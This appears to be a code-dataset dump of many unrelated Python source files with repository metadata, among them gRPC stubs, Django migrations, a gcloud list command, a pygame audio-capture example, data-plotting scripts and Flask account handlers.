app.connect("build-finished", lambda app, _: copy_tree(os.path.join(CURR_PATH, os.path.pardir, "lightgbm_r", "docs"), os.path.join(app.outdir, "R"), verbose=0)) app.add_transform(InternalRefTransform) add_js_file = getattr(app, 'add_js_file', False) or app.add_javascript add_js_file("js/script.js")
[ "noreply@github.com" ]
arXiv-research.noreply@github.com
66620a99f9c591d0399fb64135bc18f5511daf3e
9fa8c280571c099c5264960ab2e93255d20b3186
/system/scientist/experiment/remove/view.py
e49dc213fd8a1d49e71b132d6416187033778689
[ "MIT" ]
permissive
thuchula6792/AutoOED
8dc97191a758200dbd39cd850309b0250ac77cdb
272d88be7ab617a58d3f241d10f4f9fd17b91cbc
refs/heads/master
2023-07-23T16:06:13.820272
2021-09-08T14:22:18
2021-09-08T14:22:18
null
0
0
null
null
null
null
UTF-8
Python
false
false
636
py
from system.gui.widgets.factory import create_widget class RemoveExperimentView: def __init__(self, root_view): self.window = create_widget('toplevel', master=root_view.root, title='Remove Experiment') self.widget = {} self.widget['experiment_name'] = create_widget('labeled_combobox', master=self.window, row=0, column=0, columnspan=2, text='Experiment name', required=True) self.widget['remove'] = create_widget('button', master=self.window, row=1, column=0, text='Remove') self.widget['cancel'] = create_widget('button', master=self.window, row=1, column=1, text='Cancel')
[ "yunsheng@mit.edu" ]
yunsheng@mit.edu
9a38399c9e91b0b590e07ffec154c506173b08a7
e526543920e4974504cb62802c393d5bc46559db
/female-labor-force/female_labor_force.py
8661eaf2f43beec409de2f01b78fb6af53fc144d
[]
no_license
mare-astrorum/python-crash-course-practice
b843f2067208b749558c4423556498e643c5fa42
47423808902b75af9d7888d4f9fa9f083bce88f4
refs/heads/master
2020-09-06T19:02:09.837740
2019-11-08T17:30:52
2019-11-08T17:30:52
220,516,919
0
0
null
null
null
null
UTF-8
Python
false
false
1,775
py
import csv from pygal_maps_world.maps import World from country_codes import get_country_code # Load the data. filename = 'data/female_labor_force.csv' with open(filename) as f: reader = csv.reader(f) # Find the header row. for i, row in enumerate(reader): if i == 4: header_row = row # Create the dictionary containing country code and percentage of women # in labor force. cc_pop = {} for row in reader: # Eliminate the empty rows. if row: # Find population in 2016. population = row[61] # Eliminate empty values. if population != '': population = int(float(population)) country_name = row[0] country_code = get_country_code(country_name) if country_code: cc_pop[country_code] = population # Group the countries into 3 percentage levels. cc_pop_1, cc_pop_2, cc_pop_3 = {}, {}, {} for cc, pop in cc_pop.items(): if pop < 30: cc_pop_1[cc] = pop elif pop < 45: cc_pop_2[cc] = pop else: cc_pop_3[cc] = pop # See how many countries are in each group. print(len(cc_pop_1), len(cc_pop_2), len(cc_pop_3)) # Create the map. wm = World() wm.title = 'Female Labor Force in 2016, %' wm.add('<30%', cc_pop_1) wm.add('30-45%', cc_pop_2) wm.add('>45%', cc_pop_3) wm.render_to_file('female_labor_force.svg')
[ "a@a.com" ]
a@a.com
967ce7d0a562a19af62f740ed144332b93de848f
89055b2f91fb608806d4cb92754ee51f9fd7b436
/sign_up_students_first_version/signup_stats.py
0c99c7abfe71c556a5e98605529d69cc7cf6a7f1
[]
no_license
rosedu/web-workshops
52c778242e62dd7dbf8e629ab5fc8424e86a63f4
28ff91dca7f84a4a58f2ece6b94f28403e667776
refs/heads/webdev-landing
2023-05-11T06:38:48.370896
2023-05-03T16:47:58
2023-05-03T16:47:58
2,889,807
2
0
null
2023-05-03T16:47:59
2011-12-01T08:53:18
HTML
UTF-8
Python
false
false
1,222
py
import sys from collections import defaultdict import yaml mail_blacklist = ['google@gigibecali.ro'] def main(): count = defaultdict(int) for document in list(yaml.load_all(sys.stdin))[5:-1]: if document['email'] in mail_blacklist: continue count['_total'] += 1 value_sunt = document['sunt'] count['sunt', value_sunt] += 1 if value_sunt == 'student': facultate = document['student-facultate'] if ('automatica' in facultate.lower() or 'calculatoare' in facultate.lower()): facultate = 'ACS' an = document.get('student-an') if an == 'I': an = '1' if an == 'II': an = '2' if an == 'III': an = '3' if an and an[0] == '3': an = '3' count['sunt-student', facultate, an] += 1 for name in document['topic-stiu']: count['stiu', name] += 1 for name in document['topic-vreau']: count['vreau', name] += 1 from pprint import pprint pprint(dict(count)) if __name__ == '__main__': main()
[ "alex@grep.ro" ]
alex@grep.ro
e037b4c7567e546162b66093e9500d87196bea8f
70fa6468c768d4ec9b4b14fc94fa785da557f1b5
/lib/surface/compute/target_http_proxies/list.py
e0e69989cde89c8fa89a984c02884926d50f4f55
[ "LicenseRef-scancode-unknown-license-reference", "Apache-2.0" ]
permissive
kylewuolle/google-cloud-sdk
d43286ef646aec053ecd7eb58566ab2075e04e76
75f09ebe779e99fdc3fd13b48621fe12bfaa11aa
refs/heads/master
2020-04-20T22:10:41.774132
2019-01-26T09:29:26
2019-01-26T09:29:26
169,131,028
0
0
NOASSERTION
2019-02-04T19:04:40
2019-02-04T18:58:36
Python
UTF-8
Python
false
false
2,877
py
# -*- coding: utf-8 -*- # # Copyright 2014 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Command for listing target HTTP proxies.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from googlecloudsdk.api_lib.compute import base_classes from googlecloudsdk.api_lib.compute import lister from googlecloudsdk.calliope import base from googlecloudsdk.command_lib.compute.target_http_proxies import flags @base.ReleaseTracks(base.ReleaseTrack.GA, base.ReleaseTrack.BETA) class List(base.ListCommand): """List target HTTP proxies.""" @staticmethod def Args(parser): parser.display_info.AddFormat(flags.DEFAULT_LIST_FORMAT) lister.AddBaseListerArgs(parser) parser.display_info.AddCacheUpdater(flags.TargetHttpProxiesCompleter) def Run(self, args): holder = base_classes.ComputeApiHolder(self.ReleaseTrack()) client = holder.client request_data = lister.ParseNamesAndRegexpFlags(args, holder.resources) list_implementation = lister.GlobalLister( client, client.apitools_client.targetHttpProxies) return lister.Invoke(request_data, list_implementation) List.detailed_help = base_classes.GetGlobalListerHelp('target HTTP proxies') @base.ReleaseTracks(base.ReleaseTrack.ALPHA) class ListAlpha(base.ListCommand): """List Target HTTP Proxies..""" @classmethod def Args(cls, parser): parser.display_info.AddFormat(flags.DEFAULT_LIST_FORMAT) lister.AddMultiScopeListerFlags(parser, regional=True, global_=True) 
parser.display_info.AddCacheUpdater(flags.TargetHttpProxiesCompleterAlpha) def Run(self, args): holder = base_classes.ComputeApiHolder(self.ReleaseTrack()) client = holder.client request_data = lister.ParseMultiScopeFlags(args, holder.resources) list_implementation = lister.MultiScopeLister( client, regional_service=client.apitools_client.regionTargetHttpProxies, global_service=client.apitools_client.targetHttpProxies, aggregation_service=client.apitools_client.targetHttpProxies) return lister.Invoke(request_data, list_implementation) ListAlpha.detailed_help = base_classes.GetMultiScopeListerHelp( 'target HTTP proxies', scopes=[ base_classes.ScopeType.global_scope, base_classes.ScopeType.regional_scope ])
[ "cloudsdk.mirror@gmail.com" ]
cloudsdk.mirror@gmail.com
8ee1e63fa12d87ff629257f88095d3dd0647cd17
92874c7364a5c7f026fbff1f06d3100280438724
/pelicanconf.py
54517ea5a124a86cd208cd1e99324be8e4b4bbcc
[]
no_license
quintusdias/quintusdias.github.io-src
0c3e9d4d17def5a8761f0a1636d52c1147c9288f
1dd2b3143abcc38d88d0f056e5023251c615ba36
refs/heads/master
2021-01-21T11:16:15.017329
2017-03-04T12:50:16
2017-03-04T12:50:16
83,545,468
0
0
null
null
null
null
UTF-8
Python
false
false
909
py
# -*- coding: utf-8 -*- # from __future__ import unicode_literals AUTHOR = 'John Evans' SITENAME = 'https://quintusdias.github.io' SITEURL = 'https://quintusdias.github.io' PATH = 'content' TIMEZONE = 'America/New_York' DEFAULT_LANG = 'en' DEFAULT_DATE = 'fs' # Feed generation is usually not desired when developing FEED_ALL_ATOM = None CATEGORY_FEED_ATOM = None TRANSLATION_FEED_ATOM = None AUTHOR_FEED_ATOM = None AUTHOR_FEED_RSS = None # Blogroll LINKS = (('Pelican', 'http://getpelican.com/'), ('Python.org', 'http://python.org/'), ('Jinja2', 'http://jinja.pocoo.org/'), ('You can modify those links in your config file', '#'),) # Social widget SOCIAL = (('You can add links in your config file', '#'), ('Another social link', '#'),) DEFAULT_PAGINATION = 10 # Uncomment following line if you want document-relative URLs when developing #RELATIVE_URLS = True
[ "john.g.evans.ne@gmail.com" ]
john.g.evans.ne@gmail.com
0a360c6b7f3a6caf3da4bcdc61eee7acace23b5c
75d04e22b2688bc0b2c0a8dd14a4336eeb4be3bd
/distribute_data.py
69002acf95b7fa55d644aaa6f411974aa0a92fb3
[]
no_license
vbvg2008/CAPSNET
2cae7580b5e5ded96bceb67f80083f2f06654e08
5d069f7fbd8c42e2f24807f7740a97682172c254
refs/heads/master
2020-03-06T20:04:47.583855
2018-04-27T20:15:30
2018-04-27T20:15:30
127,044,254
0
0
null
null
null
null
UTF-8
Python
false
false
1,710
py
import os from shutil import copyfile original_root = '/home/jenno/Desktop/core50_128x128/' train_root = '/home/jenno/Desktop/core50_static/train' test_root = '/home/jenno/Desktop/core50_static/test' train_session = ['s1','s2','s4','s5'] test_session = ['s3','s6'] #now begin copy training data for s_current in train_session: print(s_current) session_folder = os.path.join(original_root,s_current) object_list = os.listdir(session_folder) for o_current in object_list: object_folder = os.path.join(session_folder,o_current) image_list = os.listdir(object_folder) #check if the object folder exists in training destination_root = os.path.join(train_root,o_current) if os.path.isdir(destination_root) is False: os.mkdir(destination_root) for image in image_list: src = os.path.join(object_folder,image) dst = os.path.join(destination_root,image) copyfile(src,dst) #now begin copy testing data for s_current in test_session: print(s_current) session_folder = os.path.join(original_root,s_current) object_list = os.listdir(session_folder) for o_current in object_list: object_folder = os.path.join(session_folder,o_current) image_list = os.listdir(object_folder) #check if the object folder exists in training destination_root = os.path.join(test_root,o_current) if os.path.isdir(destination_root) is False: os.mkdir(destination_root) for image in image_list: src = os.path.join(object_folder,image) dst = os.path.join(destination_root,image) copyfile(src,dst)
[ "shawnmengdong@gmail.com" ]
shawnmengdong@gmail.com
0f04671661041f0b708c2620229f78f0c46f83c2
4d66af0a7c2cbcfae37fa12f650ccc2accf2708b
/NPAF_pb2_grpc.py
1266fb26145d2dccfccf06644f48145b69d4b02d
[]
no_license
Tiffanyyor23/gRPC
804a38bcce2c509feffee101b998385d529fad80
18c06a9cb14eae7e8a673fce5aad7811c7821c3a
refs/heads/master
2023-08-01T09:42:44.731850
2021-09-16T04:10:43
2021-09-16T04:10:43
407,016,166
0
0
null
null
null
null
UTF-8
Python
false
false
2,372
py
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! """Client and server classes corresponding to protobuf-defined services.""" import grpc import NPAF_pb2 as NPAF__pb2 class RouteDataStub(object): """Missing associated documentation comment in .proto file.""" def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.CollectRoutes = channel.unary_unary( '/RouteData/CollectRoutes', request_serializer=NPAF__pb2.RouteRequest.SerializeToString, response_deserializer=NPAF__pb2.DeviceRoutes.FromString, ) class RouteDataServicer(object): """Missing associated documentation comment in .proto file.""" def CollectRoutes(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_RouteDataServicer_to_server(servicer, server): rpc_method_handlers = { 'CollectRoutes': grpc.unary_unary_rpc_method_handler( servicer.CollectRoutes, request_deserializer=NPAF__pb2.RouteRequest.FromString, response_serializer=NPAF__pb2.DeviceRoutes.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'RouteData', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) # This class is part of an EXPERIMENTAL API. class RouteData(object): """Missing associated documentation comment in .proto file.""" @staticmethod def CollectRoutes(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/RouteData/CollectRoutes', NPAF__pb2.RouteRequest.SerializeToString, NPAF__pb2.DeviceRoutes.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
[ "root@localhost.localdomain" ]
root@localhost.localdomain
40876e5aad4716d60a85e698a8107b820be76212
2f19adddc875673df742475c1c97b5aca720cac7
/venv/Lib/site-packages/pygame/examples/audiocapture.py
a5688898e35d724f0f1d1a57201e42275c36d548
[]
no_license
rosepcaldas/Cursoemvideo
4e71b1ce0fe6e5c2ac83a15ff9e18768778d1dab
c722b1f7f902e43168279cd4e0414215b8395dc6
refs/heads/master
2020-07-28T20:19:46.004918
2019-09-19T10:24:31
2019-09-19T10:24:31
209,524,974
0
0
null
null
null
null
UTF-8
Python
false
false
1,276
py
import time import pygame as pg if pg.get_sdl_version()[0] < 2: raise SystemExit('This example requires pygame 2 and SDL2.') from pygame._sdl2 import ( get_audio_device_name, get_num_audio_devices, AudioDevice, AUDIO_F32, AUDIO_ALLOW_FORMAT_CHANGE ) pg.mixer.pre_init(44100, 32, 2, 512) pg.init() # init_subsystem(INIT_AUDIO) names = [get_audio_device_name(x, 1) for x in range(get_num_audio_devices(1))] print(names) iscapture = 1 sounds = [] sound_chunks = [] def callback(audiodevice, audiomemoryview): """ This is called in the sound thread. Note, that the frequency and such you request may not be what you get. """ # print(type(audiomemoryview), len(audiomemoryview)) # print(audiodevice) sound_chunks.append(bytes(audiomemoryview)) audio = AudioDevice( devicename=names[0], iscapture=1, frequency=44100, audioformat=AUDIO_F32, numchannels=2, chunksize=512, allowed_changes=AUDIO_ALLOW_FORMAT_CHANGE, callback=callback, ) # start recording. audio.pause(0) print('recording with :%s:' % names[0]) time.sleep(5) print('Turning data into a pygame.mixer.Sound') sound = pg.mixer.Sound(buffer=b''.join(sound_chunks)) print('playing back recorded sound') sound.play() time.sleep(5)
[ "rosepcaldas@gmail.com" ]
rosepcaldas@gmail.com
3f17b54387be42dfd49e4162f5fb2bc7f40790a5
f046ecf6ec2bdc41e7bbd7012ec6d46846644af3
/carzone/cars/migrations/0001_initial.py
c085282e607a7fee584eb908c0995f3aa2ba1644
[]
no_license
varunjha18/carzone_project_updated
9f08e5b47cc6dc3d00c003797e8bc667737eb330
5853f8c569eac6c05cfe41b1a957586b1c83d48b
refs/heads/main
2023-04-28T10:59:27.598746
2021-05-26T12:55:36
2021-05-26T12:55:36
369,875,618
0
0
null
null
null
null
UTF-8
Python
false
false
3,950
py
# Generated by Django 3.1.1 on 2021-05-22 13:46 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Car', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('city', models.CharField(max_length=200)), ('state', models.CharField(choices=[('AL', 'Alabama'), ('AK', 'Alaska'), ('AZ', 'Arizona'), ('AR', 'Arkansas'), ('CA', 'California'), ('CO', 'Colorado'), ('CT', 'Connecticut'), ('DE', 'Delaware'), ('DC', 'District Of Columbia'), ('FL', 'Florida'), ('GA', 'Georgia'), ('HI', 'Hawaii'), ('ID', 'Idaho'), ('IL', 'Illinois'), ('IN', 'Indiana'), ('IA', 'Iowa'), ('KS', 'Kansas'), ('KY', 'Kentucky'), ('LA', 'Louisiana'), ('ME', 'Maine'), ('MD', 'Maryland'), ('MA', 'Massachusetts'), ('MI', 'Michigan'), ('MN', 'Minnesota'), ('MS', 'Mississippi'), ('MO', 'Missouri'), ('MT', 'Montana'), ('NE', 'Nebraska'), ('NV', 'Nevada'), ('NH', 'New Hampshire'), ('NJ', 'New Jersey'), ('NM', 'New Mexico'), ('NY', 'New York'), ('NC', 'North Carolina'), ('ND', 'North Dakota'), ('OH', 'Ohio'), ('OK', 'Oklahoma'), ('OR', 'Oregon'), ('PA', 'Pennsylvania'), ('RI', 'Rhode Island'), ('SC', 'South Carolina'), ('SD', 'South Dakota'), ('TN', 'Tennessee'), ('TX', 'Texas'), ('UT', 'Utah'), ('VT', 'Vermont'), ('VA', 'Virginia'), ('WA', 'Washington'), ('WV', 'West Virginia'), ('WI', 'Wisconsin'), ('WY', 'Wyoming')], max_length=200)), ('car_title', models.CharField(max_length=200)), ('color', models.CharField(max_length=100)), ('model', models.CharField(max_length=100)), ('year', models.CharField(max_length=100)), ('condition', models.CharField(max_length=100)), ('price', models.IntegerField()), ('description', models.TextField(max_length=600)), ('car_photo', models.ImageField(upload_to='photos/%y/%m/%d/')), ('car_photo_1', models.ImageField(blank=True, upload_to='photos/%y/%m/%d/')), ('car_photo_2', models.ImageField(blank=True, 
upload_to='photos/%y/%m/%d/')), ('car_photo_3', models.ImageField(blank=True, upload_to='photos/%y/%m/%d/')), ('car_photo_4', models.ImageField(blank=True, upload_to='photos/%y/%m/%d/')), ('features', models.CharField(choices=[('Cruise Control', 'Cruise Control'), ('Audio Interface', 'Audio Interface'), ('Airbags', 'Airbags'), ('Air Conditioning', 'Air Conditioning'), ('Seat Heating', 'Seat Heating'), ('Alarm System', 'Alarm System'), ('ParkAssist', 'ParkAssist'), ('Power Steering', 'Power Steering'), ('Reversing Camera', 'Reversing Camera'), ('Direct Fuel Injection', 'Direct Fuel Injection'), ('Auto Start/Stop', 'Auto Start/Stop'), ('Wind Deflector', 'Wind Deflector'), ('Bluetooth Handset', 'Bluetooth Handset')], max_length=100)), ('body_style', models.CharField(max_length=100)), ('engine', models.CharField(max_length=100)), ('transmission', models.CharField(max_length=100)), ('interiors', models.CharField(max_length=100)), ('miles', models.IntegerField()), ('doors', models.CharField(choices=[('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6')], max_length=100)), ('passengers', models.IntegerField()), ('vin_no', models.CharField(max_length=100)), ('milage', models.IntegerField()), ('fuel_type', models.CharField(max_length=100)), ('no_of_owners', models.CharField(max_length=100)), ('is_featured', models.BooleanField(default=False)), ('created_date', models.DateTimeField(auto_now_add=True)), ], ), ]
[ "varunjha2000@gmail.com" ]
varunjha2000@gmail.com
fe123e0751e952b397db20f1c47b285ee1f6d27b
f569978afb27e72bf6a88438aa622b8c50cbc61b
/douyin_open/ShareIdShareId/__init__.py
b05b76dadef0b38f532e88c1a0b30e636ba79cb3
[]
no_license
strangebank/swagger-petstore-perl
4834409d6225b8a09b8195128d74a9b10ef1484a
49dfc229e2e897cdb15cbf969121713162154f28
refs/heads/master
2023-01-05T10:21:33.518937
2020-11-05T04:33:16
2020-11-05T04:33:16
310,189,316
1
0
null
null
null
null
UTF-8
Python
false
false
966
py
# coding: utf-8 # flake8: noqa """ No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501 OpenAPI spec version: 1.0.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import # import apis into sdk package from douyin_open.ShareIdShareId.api.share_id_api import ShareIdApi # import ApiClient from douyin_open.ShareIdShareId.api_client import ApiClient from douyin_open.ShareIdShareId.configuration import Configuration # import models into sdk package from douyin_open.ShareIdShareId.models.description import Description from douyin_open.ShareIdShareId.models.error_code import ErrorCode from douyin_open.ShareIdShareId.models.extra_body import ExtraBody from douyin_open.ShareIdShareId.models.inline_response200 import InlineResponse200 from douyin_open.ShareIdShareId.models.inline_response200_data import InlineResponse200Data
[ "strangebank@gmail.com" ]
strangebank@gmail.com
4a0beee1ac136b3e523feffcfa1e9a36ce6d967f
9c58a1f594e18cee20128f2c8dad8257429b10d1
/custom_business_reports/wizard/sales_per_product.py
495d5e1113521f969a5ae62178d4d361b1ebd2c6
[]
no_license
gastonfeng/Odoo-eBay-Amazon
e8919768b2a1500209f209ee3aecc7f2fb10cda7
a9c4a8a7548b19027bc0fd904f8ae9249248a293
refs/heads/master
2022-04-05T00:23:50.483430
2020-02-19T04:58:56
2020-02-19T04:58:56
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,007
py
# -*- coding: utf-8 -*- from datetime import datetime, timedelta from pytz import timezone import pytz from odoo import models, fields, api class SalesPerProduct(models.TransientModel): _name = 'sales.per.product.wizard' period_start = fields.Date('Period start', help="Date when the current period starts, sales will be counted one day/week/month to the past and to the future of this date", default = datetime.now() + timedelta(weeks=-1), required = True) grouping_criteria = fields.Selection([('day', 'Day'), ('week', 'Week'), ('month', 'Month')], 'Grouping criteria', required=True, default='week') drop_percentage = fields.Integer(required=True, help="This report shows LADs where the sales drop percentage is higher than this percentage", default=0) @api.multi def button_download_report(self): return { 'type': 'ir.actions.act_url', 'url': '/reports/sales_per_product?id=%s' % (self.id), 'target': 'new', }
[ "yjm@mail.ru" ]
yjm@mail.ru
ab83b4c18b59a01c63603528d3559e0f3d384862
cd5746f8cc7aee1f20606a65b4fae0d5e8ee78dc
/Python Books/Mastering-Machine-Learning-scikit-learn/NumPy-Beginner/CODE/Chapter2/shapemanipulation.py
b1649ea9beac68249de1ddd6e164eba87ed89124
[]
no_license
theGreenJedi/Path
df24fca355590efef0c6cb5c52e7216c6b5d2464
b5ed2805dbb046480929e49e550bfd8af5bb4d6f
refs/heads/master
2023-07-27T14:23:37.694546
2021-07-16T01:38:55
2021-07-16T01:38:55
87,686,563
8
2
null
2023-07-11T22:49:03
2017-04-09T05:57:30
Jupyter Notebook
UTF-8
Python
false
false
1,451
py
from __future__ import print_function import numpy as np # Chapter 2 Beginning with NumPy fundamentals # # Demonstrates multi dimensional arrays slicing. # # Run from the commandline with # # python shapemanipulation.py print("In: b = arange(24).reshape(2,3,4)") b = np.arange(24).reshape(2,3,4) print("In: b") print(b) #Out: #array([[[ 0, 1, 2, 3], # [ 4, 5, 6, 7], # [ 8, 9, 10, 11]], # # [[12, 13, 14, 15], # [16, 17, 18, 19], # [20, 21, 22, 23]]]) print("In: b.ravel()") print(b.ravel()) #Out: #array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, # 17, 18, 19, 20, 21, 22, 23]) print("In: b.flatten()") print(b.flatten()) #Out: #array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, # 17, 18, 19, 20, 21, 22, 23]) print("In: b.shape = (6,4)") b.shape = (6,4) print("In: b") print(b) #Out: #array([[ 0, 1, 2, 3], # [ 4, 5, 6, 7], # [ 8, 9, 10, 11], # [12, 13, 14, 15], # [16, 17, 18, 19], # [20, 21, 22, 23]]) print("In: b.transpose()") print(b.transpose()) #Out: #array([[ 0, 4, 8, 12, 16, 20], # [ 1, 5, 9, 13, 17, 21], # [ 2, 6, 10, 14, 18, 22], # [ 3, 7, 11, 15, 19, 23]]) print("In: b.resize((2,12))") b.resize((2,12)) print("In: b") print(b) #Out: #array([[ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11], # [12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23]])
[ "GreenJedi@protonmail.com" ]
GreenJedi@protonmail.com
8db48489893a0ddd39db9dc8bd3cba251c0a46ba
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/nouns/_determinations.py
19cd727e8dba49b7d873037177329135ce8d5944
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
287
py
from xai.brain.wordbase.nouns._determination import _DETERMINATION #calss header class _DETERMINATIONS(_DETERMINATION, ): def __init__(self,): _DETERMINATION.__init__(self) self.name = "DETERMINATIONS" self.specie = 'nouns' self.basic = "determination" self.jsondata = {}
[ "xingwang1991@gmail.com" ]
xingwang1991@gmail.com
83c9ee9ea54b7d98e295f2b62de4a2bc7770d39d
a6cea8d1455f4927126b848c8598310a9242ab86
/Handlers/Account.py
53bd377011f4f62cef75ae4977af6e7d137b55db
[]
no_license
martin-woolstenhulme/sendwithfriends
35b4410bda49fbfdfaf8920311e217db6758d2cf
2daa32553dbace291c950ccd6de1bc5107ef50f7
refs/heads/master
2020-06-08T19:41:36.802905
2014-09-07T09:13:13
2014-09-07T09:13:13
23,756,328
0
1
null
null
null
null
UTF-8
Python
false
false
1,823
py
from flask import make_response from flask import render_template, request, url_for, redirect, session, flash from db_schema.db_functions import * import json from flask import jsonify import logging def signup_account(): data = request.json print data # retrieve information password = data.get('password') email = data.get('email') userid = addUserAccount('', '', email, '') mm={'error':None, 'status':'ok'} mm['next_url'] = '/profile' if mm['error'] is not None: mm['status'] = 'error' mm['userid'] = userid resp = make_response(jsonify(mm)) resp.headers['Content-Type'] = "application/json" return resp def update_account(): data = request.json print data token = data.get('token') provider = 'braintree' userid = read_cookie() # retrieve information name = data.get('name').split() firstname = name[0] lastname = name[1] phone = data.get('tel') user = getUser(userid) email = user[2] userid = updateUserAccount(userid, firstname, lastname, email, phone) addPayment(userid, token, provider) mm={'error':None, 'status':'ok'} mm['next_url'] = '/add_contact' if mm['error'] is not None: mm['status'] = 'error' resp = make_response(jsonify(mm)) resp.headers['Content-Type'] = "application/json" return resp def update_contacts(): data = request.json print data emails = data.get('emails') userid = read_cookie() for e in emails: addFriendByEmail(userid, e) mm={'error':None, 'status':'ok'} mm['next_url'] = '/send_money' resp = make_response(jsonify(mm)) resp.headers['Content-Type'] = "application/json" return resp def read_cookie(): return request.cookies.get('userid')
[ "elaine.ou@gmail.com" ]
elaine.ou@gmail.com
4c93cf5084fb9a5d19b1bb301af8711a8767007c
75169b83f2b975bff8baf61f0cf1264cf4b71a28
/worker/Reversion/model/alert.py
5d39269c05c0207078a50efc165d26a768c682bb
[]
no_license
Pangpang2/Python
a27024587ae51923954deefaaff304a26e5a944f
0b3bcfbdcaa71253c798090713c052fd397bff3f
refs/heads/master
2022-12-01T10:03:23.214443
2020-08-26T00:21:15
2020-08-26T00:21:15
290,171,195
0
0
null
null
null
null
UTF-8
Python
false
false
268
py
class Alert(object): def __init__(self): self.id = '' self.description = '' def to_dictionary(self): alert_dict = {} alert_dict['id'] = self.id alert_dict['description'] = self.description return alert_dict
[ "may.li@internetbrands.com" ]
may.li@internetbrands.com
9d831a96d6db798d73e1650111af5d03adeab6f4
89260668655a46278e8f22a5807b1f640fd1490c
/mySite/records/migrations/0014_auto_20170529_0026.py
0f52f66b638d5bcb22cd6f408f1e76344fa3d40d
[]
no_license
happychallenge/mySite
926136859c5b49b7fd8baff09b26f375b425ab30
ddbda42d5d3b9c380a594d81a27875b4ad10358b
refs/heads/master
2020-12-30T13:28:31.018611
2017-11-08T02:52:18
2017-11-08T02:52:18
91,218,922
0
0
null
null
null
null
UTF-8
Python
false
false
1,759
py
# -*- coding: utf-8 -*- # Generated by Django 1.11 on 2017-05-29 00:26 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('records', '0013_auto_20170525_2329'), ] operations = [ migrations.CreateModel( name='Evidence', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created_at', models.DateTimeField(auto_now_add=True)), ('created_user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='records.News')), ('personevent', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='records.PersonEvent')), ], ), migrations.AlterUniqueTogether( name='eventnews', unique_together=set([]), ), migrations.RemoveField( model_name='eventnews', name='created_user', ), migrations.RemoveField( model_name='eventnews', name='event', ), migrations.RemoveField( model_name='eventnews', name='news', ), migrations.DeleteModel( name='EventNews', ), migrations.AlterUniqueTogether( name='evidence', unique_together=set([('personevent', 'news')]), ), ]
[ "happychallenge@outlook.com" ]
happychallenge@outlook.com
0805fbf1572f603152c9f49194310966efe9515c
846906de1e1ce1579ed8c0bc6ba3454f87791856
/NetworkBehaviour/Logic/TensorflowModules/TensorflowBehaviour.py
262439e6a4403a4cd3f4d29f39b56674682f1f88
[]
no_license
abahmer/PymoNNto
48d1a53d660c6da7f45048e61f6bd8954f24ecaf
17e117c971c1faa44205a69fc095a392aa7a7b9a
refs/heads/master
2023-03-21T07:40:42.336567
2021-03-08T12:28:46
2021-03-08T12:28:46
null
0
0
null
null
null
null
UTF-8
Python
false
false
324
py
from PymoNNto.NetworkCore.Behaviour import * import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' import tensorflow as tf class TensorflowBehaviour(Behaviour): def set_variables(self, neurons): if not hasattr(neurons, 'tf'): neurons.tf = tf super().set_variables(neurons)
[ "mv15go@gmail.com" ]
mv15go@gmail.com
e2eb4050d6367ccba352643e8999a26590f0a3d0
453ca12d912f6498720152342085636ba00c28a1
/leetcode/backtracking/python/wildcard_matching_leetcode.py
67c7f721cab4c6eab9cd03006a6c461377f9bfb3
[]
no_license
yanbinkang/problem-bank
f9aa65d83a32b830754a353b6de0bb7861a37ec0
bf9cdf9ec680c9cdca1357a978c3097d19e634ae
refs/heads/master
2020-06-28T03:36:49.401092
2019-05-20T15:13:48
2019-05-20T15:13:48
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,976
py
